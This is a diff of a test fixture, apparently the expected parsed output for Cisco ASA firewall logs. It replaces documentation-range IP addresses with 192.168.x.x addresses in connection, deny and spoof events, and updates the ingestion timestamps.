@@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565753400Z", - "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395198100Z", + "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565761200Z", - "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395203500Z", + "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, 
@@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565768900Z", - "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395208900Z", + "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565776400Z", - "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395214400Z", + "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" 
@@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565784300Z", - "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:34:16.395220Z", + "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565791900Z", - "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:34:16.395225400Z", + "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, 
@@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565799700Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395230900Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565807400Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395236300Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, 
@@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565815Z", - "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395241700Z", + "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565822600Z", + "ingested": "2021-12-09T13:34:16.395247200Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2821,8 +2821,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2858,13 +2858,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565830400Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:34:16.395252700Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", 
@@ -2894,8 +2894,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2931,13 +2931,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565834600Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:34:16.395258200Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2972,8 +2972,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3007,13 +3007,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565838100Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:34:16.395263600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3029,7 +3029,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 
@@ -3050,8 +3050,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3085,13 +3085,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565843400Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:34:16.395269100Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3107,7 +3107,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3128,8 +3128,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3160,7 +3160,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3168,8 +3168,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565848700Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:34:16.395274600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3205,8 +3205,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3237,7 +3237,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3245,8 +3245,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565855400Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:34:16.395280100Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3282,8 +3282,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3314,7 +3314,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, 
@@ -3322,8 +3322,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565860700Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:34:16.395285500Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3359,8 +3359,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3385,14 +3385,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565864700Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:34:16.395291100Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3425,8 +3425,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -3451,14 +3451,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565868900Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:34:16.395296500Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3486,8 +3486,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3523,13 +3523,13 @@ "related": { "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565892Z", - "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:34:16.395318800Z", + "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3564,8 +3564,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -3596,14 +3596,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565897700Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:34:16.395324800Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3619,7 +3619,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3640,8 +3640,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3672,14 +3672,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565902800Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:34:16.395330200Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3695,7 +3695,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3716,8 +3716,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3748,7 +3748,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3756,8 +3756,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:38.565909200Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:34:16.395335600Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-10-06T20:55:38.565916700Z", + "ingested": "2021-12-09T13:34:16.395341Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3857,8 +3857,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3888,7 +3888,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -3896,8 +3896,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565924100Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395346200Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3921,8 +3921,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -3952,7 +3952,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -3960,8 +3960,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565931500Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395351500Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3985,8 +3985,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4016,7 +4016,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -4024,8 +4024,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565938900Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395356800Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4049,8 +4049,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4080,7 +4080,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4088,8 +4088,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565946300Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395361500Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4113,8 +4113,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4144,7 +4144,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { 
@@ -4152,8 +4152,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565953800Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395366900Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4177,8 +4177,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4208,7 +4208,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4216,8 +4216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565961300Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:34:16.395372200Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565965600Z", + "ingested": "2021-12-09T13:34:16.395377500Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565969100Z", + "ingested": "2021-12-09T13:34:16.395382700Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4375,8 +4375,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4410,7 +4410,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4419,8 +4419,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565974300Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:34:16.395387Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-06T20:55:38.565979400Z", + "ingested": "2021-12-09T13:34:16.395390600Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565985800Z", + "ingested": "2021-12-09T13:34:16.395394500Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4576,15 +4576,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, 